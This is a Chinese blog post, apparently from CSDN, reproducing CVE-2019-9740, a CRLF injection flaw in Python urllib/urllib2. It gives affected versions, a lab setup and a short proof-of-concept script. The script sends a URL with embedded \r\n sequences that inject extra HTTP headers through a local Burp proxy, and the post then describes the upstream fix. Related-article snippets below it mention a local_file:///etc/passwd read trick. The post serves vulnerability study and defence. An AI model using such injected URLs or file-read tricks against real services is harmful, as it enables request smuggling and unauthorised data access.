(环境搭建+复现)CVE-2019-9740 Python urllib CRLF 注入

最新推荐文章于 2023-03-27 20:33:24 发布
最新推荐文章于 2023-03-27 20:33:24 发布
阅读量2k 收藏 2
点赞数
分类专栏: 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_40989258/article/details/104735997
版权

【CVE编号】

CVE-2019-9740

【漏洞名称】

Python urllib CRLF 命令注入漏洞

1【靶标分类】

通用漏洞组件

2【影响版本】

Python 2.x版本至2.7.16版本中的urllib2

Python 3.x版本至3.7.2版本中的urllib

3【漏洞分类】

命令注入

4【漏洞等级】

5【漏洞简介】

Python是Python软件基金会的一套开源的、面向对象的程序设计语言。该语言具有可扩展、支持模块和包、支持多种平台等特点。urllib是其中的一个用于处理URL的模块。urllib2是其中的一个用于获取URL(统一资源定位符)的模块。

Python 2.x版本至2.7.16版本中的urllib2和Python 3.x版本至3.7.2版本中的urllib存在注入漏洞。该漏洞源于用户输入构造命令、数据结构或记录的操作过程中,网络系统或产品缺乏对用户输入数据的正确验证,未过滤或未正确过滤掉其中的特殊元素,导致系统或产品产生解析或解释方式错误。

0x01【靶标运行环境】

操作系统:win7专业版

中间件版本:Apache 2.4.23(win32)

编程语言版本:PHP 5.4.45

数据库版本:MySQL 5.5.53

Python版本:2.7.15

工具:burpsuite,phpstudy

 

【靶标利用过程】

工具:burpsuite,phpstudy

  1. 编写poc文件1.py,验证漏洞存在
  2. # The proxy address and port:
import urllib2
proxy_info = { 'host' : '127.0.0.1',
               'port' : 8080
             }

# We create a handler for the proxy
proxy_support = urllib2.ProxyHandler({"http" : "http://%(host)s:%(port)d" % proxy_info})

# We create an opener which uses this handler:
opener = urllib2.build_opener(proxy_support)

# Then we install this opener as the default opener for urllib2:
urllib2.install_opener(opener)

# Now we can send our HTTP request:
url = "http://127.0.0.1?a=1 HTTP/1.1\r\nCRLF-injection: test\r\nTEST: 123:8080/test/?test=a"
htmlpage = urllib2.urlopen(url).read()
print htmlpage

 

3、运行poc,这里我们使用urllib2的代理服务到burp上,让我们比较明显的看到漏洞的发生。

 

 

  1. 【解决方案】

官方解决方案

https://github.githistory.xyz/python/cpython/blob/96aeaec64738b730c719562125070a52ed570210/Lib/http/client.py

在putrequest方法上对url进行检查,匹配所有的ascii码在00到32的所有字符,并且同时匹配\x7f字符防止CRLF漏洞的发生。

Referer:

http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201903-484

https://xz.aliyun.com/t/5123

daxi0ng
关注
专栏目录
CVE-2019-9740 Python urllib CRLF注入漏洞复现
afei001
01-10 911
目录 1.CRLF注入介绍 2.漏洞概述 3.影响版本 4.漏洞等级 5.漏洞复现 5.1 Python 3.7.2中的urllib 5.2 Python 2.7.16中的urllib2 5.3 攻击场景 6.漏洞修复 1.CRLF注入介绍 CRLF注入漏洞,是由于Web应用没有对用户输入做严格验证,导致攻击者可以输入一些恶意字符。攻击者一旦向请求行或首部中的字段注入恶意的CRLF,就能注入一些首部字段或报文主体,并在响应中输出,所以又称为HTTP响应拆分漏洞(HTTP ...
复现awvs——CRLF注入漏洞
记录并分享学习安全的知识点..
01-10 4057
一、CRLF介绍 CRLF是Carriage-Return Line-Feed的缩写,意思是回车换行,就是回车(CR, ASCII 13, \r)、 换行(LF, ASCII 10, \n)。换行在有的ASCII码表也用newline(简nl)来进行表示,这里的lf是line feed的概念,意思是一样的。 注:CRLF命令它表示是键盘上的"Enter"键(可以用来模拟回车键)。 Windows:使用CRLF表示行的结束 Linux/Unix:使用LF表示行的结束 二、CRLF注入 就是说
Python urllib HTTP头注入漏洞
weixin_30298497的博客
03-08 207
virusdefender · 2016/06/17 17:19from:blog.blindspotsecurity.com/2016/06/adv…0x00 总览Pythonurllib库(在Python2中为urllib2,在Python3中为urllib)有一个HTTP协议下的协议流注入漏洞。如果攻击者可以控制Python代码访问任意URL或者让Python代码访问一个恶意的web se...
CRLF
jji8877032的专栏
04-05 1809
CRLF:Carriage Retun Line Feed CRLF:回车换行   回车:回到当前行的最左边; 换行:另起一行
Nginx配置不当(CRLF注入 、目录穿越)
浅笑996的博客
11-23 3031
基于vulhub漏洞环境 环境搭建参考:https://blog.csdn.net/qq_36374896/article/details/84102101 1.漏洞名称 CRLF注入 2.漏洞原理 Nginx会将$uri进行解码,导致传入%0a%0d即可引入换行符,造成CRLF注入漏洞。 错误的配置文件示例(原本的目的是为了让http的请求跳转到https上): location / { ...
CVE-2019-11708:针对Windows 64位版本的Firefox的完整漏洞利用链(CVE-2019-11708和CVE-2019-9810)
02-04
CVE-2019-11708和CVE-2019-9810的全链漏洞利用 这是针对Windows 64位Firefox的完整的浏览器入侵漏洞利用链(CVE-2019-11708和CVE-2019-9810)。 它使用CVE-2019-9810在内容流程以及父流程中获取代码执行,并使用CVE-...
Jackson 最新反序列化漏洞(CVE-2019-14361和CVE-2019-14439)
05-08
Jackson官方github仓库发布安全issue,涉及漏洞CVE-2019-14361和CVE-2019-14439,均是针对CVE-2019-12384漏洞的绕过利用方式,当用户提交一个精心构造的恶意JSON数据到WEB服务器端时,可导致远程任意代码执行。...
CRLF注入(HTTP响应拆分-截断)
最新发布
m0_51468027的博客
03-27 4221
2023年HW厂商斗象面试题——CRLF注入
HTTP响应拆分攻击(CRLF Injection)
weixin_50464560的博客
07-03 4727
初识HTTP响应拆分攻击(CRLF Injection) 阅读量    105368 ...
CVE-2022-0391
qq_29060627的博客
06-11 2042
Python 注入漏洞 CVE-2022-0391
(环境搭建+复现) CVE-2019-6339 Drupal 远程代码执行漏洞
daxi0ng的博客
03-20 3113
CVE编号】 CVE-2019-6341 【漏洞名称】 Drupal XSS漏洞 1【靶标分类】 Web类型类靶标 2【影响版本】 在7.65之前的Drupal 7版本中; 8.6.13之前的Drupal 8.6版本; 8.5.14之前的Drupal 8.5版本。 3【漏洞分类】 XSS 4【漏洞等级】 中 5【漏洞简介】 Drupal诞生于2000年,是一个基于PHP语言编写的开发型CMF(内...
CRLF log 注入
gjswxhb的专栏
10-25 4939
在项目开发时经常会用到第三方的代码包,当我们在代码重用时注意,像这种开源的第三方类的修改是不受控的,直接应用它时,留下了隐患。 应将其隐藏尽量避免其在项目代码中扩散,遵守“开扩展,闭修改”原则。组合、代理都是很好的方式。 Log4j是Apache的一个开放源代码项目,通过使用Log4j,我们可以控制日志信息输送的目的地是控制台、文件、GUI组件、甚至是套接口服务器、NT的事件记录器、UNI
CRLF Injection漏洞的利用与实例分析
yggcwhat
01-15 528
0x00 背景 CRLFInjection很少遇见,这次被我逮住了。我看zone中(http://zone.wooyun.org/content/13323)还有一些同学对于这个漏洞不甚了解,甚至分不清它与CSRF,我详细说一下吧。 CRLF是”回车+换行”(\r\n)的简称。在HTTP协议中,HTTPHeader与HTTPBody是用两个CRLF分隔的,浏览器就是根据这两个CRLF来取出HTTP内容并显示出来。所以,一旦我们能够控制HTTP消息头中的字符,注入一些恶意的换行,这样我们就能...
CRLF注入漏洞学习记录
baynk的博客
05-07 816
放假抽空把学习的知识记录一下!之前居然没听过CRLF注入漏洞,半夜看群友水群,学习了一波。 0x00 CRLF注入漏洞 从owasp.org上找到对应的解释,CRLF即为CR(\r)回车和LF(\n)换行,在不同的操作系统上有不同的作用,比如windows中\r\n才代表换行,但是在Linux中只有LF(\n)才代表换行,早期的macos系统也有使用CR(\r)代表换行的。 一段有意思的故事 据野史记载,在很久以前的机械打字机时代,CR和LF分别具有不同的作用: LF会将打印纸张上移一行位置,但是保持
Python 3.7.1 模块 urllib.request
百年da孤独 的专栏
12-19 6626
目录1. 功能urllib.request.urlopen(url, data=None, [timeout, ]*, cafile=None, capath=None, cadefault=False, context=None) 源代码: Lib / urllib / request.py 此模块定义了有助于在现实环境中打开URL(主要是HTTP)的函数和类 - 基本和摘要式身份验证,重定向...
python的文件读取(CVE-2019-9948)
火柴人的博客
04-23 1215
Python 2.x到2.7.16中的urllib支持local_file:方案,这使远程攻击者更容易绕过将文件URI列入黑名单的保护机制,如触发urllib.urlopen('local_file:///etc / passwd') 可以得到回显。 我看别的大佬读取文件时local_file:///都有三个'/' 在python2中有urlliburllib2之分,但是这个漏洞只适合urlli...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值